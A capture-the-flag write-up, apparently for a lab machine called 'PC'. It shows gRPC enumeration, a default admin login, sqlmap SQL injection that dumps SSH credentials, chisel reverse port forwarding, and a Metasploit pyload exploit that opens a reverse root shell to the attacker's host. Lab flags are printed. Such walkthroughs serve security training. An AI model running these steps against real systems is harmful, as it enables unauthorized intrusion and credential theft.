Scan

> TARGET=10.129.227.81 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT      STATE SERVICE REASON         VERSION
22/tcp    open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
50051/tcp open  unknown syn-ack ttl 63
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port50051-TCP:V=7.93%I=7%D=5/21%Time=6469DD30%P=x86_64-pc-linux-gnu%r(N
SF:ULL,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\x0
SF:6\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(Generic
SF:Lines,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\
SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(GetRe
SF:quest,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\
SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(HTTPO
SF:ptions,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0
SF:\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RTSP
SF:Request,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\
SF:0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RPC
SF:Check,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\
SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(DNSVe
SF:rsionBindReqTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\
SF:xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0
SF:")%r(DNSStatusRequestTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0
SF:\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\
SF:0\0\?\0\0")%r(Help,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0
SF:\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\
SF:0\0")%r(SSLSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x0
SF:5\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0
SF:\?\0\0")%r(TerminalServerCookie,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xf
SF:f\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0
SF:\0\0\0\0\0\?\0\0")%r(TLSSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?
SF:\xff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x0
SF:8\0\0\0\0\0\0\?\0\0")%r(Kerberos,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\x
SF:ff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\
SF:0\0\0\0\0\0\?\0\0")%r(SMBProgNeg,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\x
SF:ff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\
SF:0\0\0\0\0\0\?\0\0")%r(X11Probe,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff
SF:\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\
SF:0\0\0\0\0\?\0\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Investigate the port 50051
└─# nc -vn 10.129.227.81 50051
(UNKNOWN) [10.129.227.81] 50051 (?) open
▒?��?�� ?@Did not receive HTTP/2 settings before handshake timeout

> curl --http2 http://10.129.227.81:50051 
curl: (1) Received HTTP/0.9 when not allowed

> curl --http0.9 http://10.129.227.81:50051 -o-
▒?��?�� ?
  • Several evidence leads to gRPC server, install grpcurl and try again
└─# ~/go/bin/grpcurl  -plaintext 10.129.227.81:50051 list 
SimpleApp
grpc.reflection.v1alpha.ServerReflection

└─# ~/go/bin/grpcurl  -plaintext 10.129.227.81:50051 list SimpleApp                                                    
SimpleApp.LoginUser
SimpleApp.RegisterUser
SimpleApp.getInfo

User: sau

  • Using grpcui can open a webui
─# ~/go/bin/grpcui -plaintext 10.129.227.81:50051
gRPC Web UI available at http://127.0.0.1:43395/
[GFX1-]: Unrecognized feature ACCELERATED_CANVAS2D
Missing chrome or resource URL: resource://gre/modules/UpdateListener.jsm
Missing chrome or resource URL: resource://gre/modules/UpdateListener.sys.mjs
  • Register a user and login using the webui
# login
POST /invoke/SimpleApp.LoginUser HTTP/1.1
{"metadata":[],"data":[{"username":"test","password":"test"}]}

## response
{
  "headers": [
    {
      "name": "content-type",
      "value": "application/grpc"
    },
    {
      "name": "grpc-accept-encoding",
      "value": "identity, deflate, gzip"
    }
  ],
  "error": null,
  "responses": [
    {
      "message": {
        "message": "Your id is 645."
      },
      "isError": false
    }
  ],
  "requests": {
    "total": 1,
    "sent": 1
  },
  "trailers": [
    {
      "name": "token",
      "value": "b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTY4NDY3MTcxMX0.GMGXLmyShXPHP8gOU5XDkEbPgZ4b60iZIoZERfhUB3Y'"
    }
  ]
}
  • Then can add a header token to query /invoke/SimpleApp.getInfo
POST /invoke/SimpleApp.getInfo HTTP/1.1

{"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTY4NDY3MTcxMX0.GMGXLmyShXPHP8gOU5XDkEbPgZ4b60iZIoZERfhUB3Y"}],"data":[{"id":"1"}]}


## response
{
  "headers": [
    {
      "name": "content-type",
      "value": "application/grpc"
    },
    {
      "name": "grpc-accept-encoding",
      "value": "identity, deflate, gzip"
    }
  ],
  "error": null,
  "responses": [
    {
      "message": {
        "message": "The admin is working hard to fix the issues."
      },
      "isError": false
    }
  ],
  "requests": {
    "total": 1,
    "sent": 1
  },
  "trailers": []
}
  • There is a user called admin, can login as admin:admin
└─# curl http://kali:43395/invoke/SimpleApp.LoginUser -d '{"metadata":[],"data":[{"username":"admin","password":"admin"}]}' -H 'Cookie: _grpcui_csrf_token=iiqIdGFElShuDFWaLRu-scnvErn9lDNWNfTLwbjO4xE' -H 'x-grpcui-csrf-token: iiqIdGFElShuDFWaLRu-scnvErn9lDNWNfTLwbjO4xE' -H 'Content-Type: application/json'
{
  "headers": [
    {
      "name": "content-type",
      "value": "application/grpc"
    },
    {
      "name": "grpc-accept-encoding",
      "value": "identity, deflate, gzip"
    }
  ],
  "error": null,
  "responses": [
    {
      "message": {
        "message": "Your id is 863."
      },
      "isError": false
    }
  ],
  "requests": {
    "total": 1,
    "sent": 1
  },
  "trailers": [
    {
      "name": "token",
      "value": "b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODQ2NzMxMTN9.1UjkoGoHlYgGVL99budVUjEebim1WKK0A142A8pvj4c'"
    }
  ]
}
  • SQLi exists on id
└─# sqlmap -u http://kali:43395/invoke/SimpleApp.getInfo -H 'Cookie: _grpcui_csrf_token=aaa' -H 'x-grpcui-csrf-token: aaa' -H 'Content-Type: application/json' --data '{"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODQ2NzQ2MTN9.6SLB2bFqdMdDHDGK3kUR3RuwqKTN8KpJpomW2eIpqX8"}],"data":[{"id":"1*"}]}' --dump

[07:22:16] [INFO] table 'SQLite_masterdb.messages' dumped to CSV file '/root/.local/share/sqlmap/output/kali/dump/SQLite_masterdb/messages.csv'
[07:22:16] [INFO] fetching columns for table 'accounts' 
[07:22:16] [INFO] fetching entries for table 'accounts'
[07:22:18] [INFO] retrieved: 'admin','admin'
[07:22:19] [INFO] retrieved: 'HereIsYourPassWord1431','sau'
  • login as sau via ssh to get the user flag
└─# ssh sau@10.129.227.81                                                               
sau@10.129.227.81's password: 
Last login: Mon May 15 09:00:44 2023 from 10.10.14.19
sau@pc:~$ ls
user.txt
sau@pc:~$ cat user.txt 
d9c6a8eaf9a127019c2c882188355e5f

PE: root

  • upload linpeas and find some open ports
[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:9666            0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::50051                :::*                    LISTEN      -
  • upload chisel to forward ports
# kali
> chisel server -p 9999 --reverse

# target
> chisel client --max-retry-count=1 10.10.16.59:9999 R:8000:localhost:8000 R:9666:localhost:9666
msf6 > use exploit/linux/http/pyload_js2py_exec
msf6 exploit(linux/http/pyload_js2py_exec) > set RHOSTS 127.0.0.1
msf6 exploit(linux/http/pyload_js2py_exec) > set LHOST 10.10.16.59
msf6 exploit(linux/http/pyload_js2py_exec) > set TARGET 0
msf6 exploit(linux/http/pyload_js2py_exec) > set payload cmd/unix/reverse
msf6 exploit(linux/http/pyload_js2py_exec) > run

[*] Started reverse TCP double handler on 10.10.16.59:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/reverse
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo NQpaM695yOwowJQe;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "NQpaM695yOwowJQe\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.16.59:4444 -> 10.129.227.81:39022) at 2023-05-21 07:45:51 -0400

shell
[*] Trying to find binary 'python' on the target machine
[-] python not found
[*] Trying to find binary 'python3' on the target machine
id
[*] Found python3 at /usr/bin/python3
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /usr/bin/bash
id
uid=0(root) gid=0(root) groups=0(root)
root@pc:~/.pyload/data# cat /root/root.txt
cat /root/root.txt
954ba7074ecdb8cddb857055039e8b3b
root@pc:~/.pyload/data# 

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack